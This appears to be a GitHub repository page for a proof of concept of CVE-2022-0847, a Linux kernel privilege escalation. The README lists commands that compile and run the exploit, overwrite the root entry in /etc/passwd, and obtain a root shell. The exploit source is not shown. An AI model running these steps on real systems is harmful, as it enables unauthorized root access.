Skip to content

CVE-2022-0847: Linux Kernel Privilege Escalation Vulnerability

Notifications You must be signed in to change notification settings

tadryanom/ahrixia_CVE_2022_0847

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

CVE_2022_0847

CVE-2022-0847: Linux Kernel Privilege Escalation Vulnerability


POC

A Simple Proof of concept to get root shell.

$ gcc cve_2022_0847.c -o exploit
$ ./exploit /etc/passwd 1 ootz:
$ su rootz
# id
uid=0(root) gid=0(root) groups=0(root)

About

CVE-2022-0847: Linux Kernel Privilege Escalation Vulnerability

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C 100.0%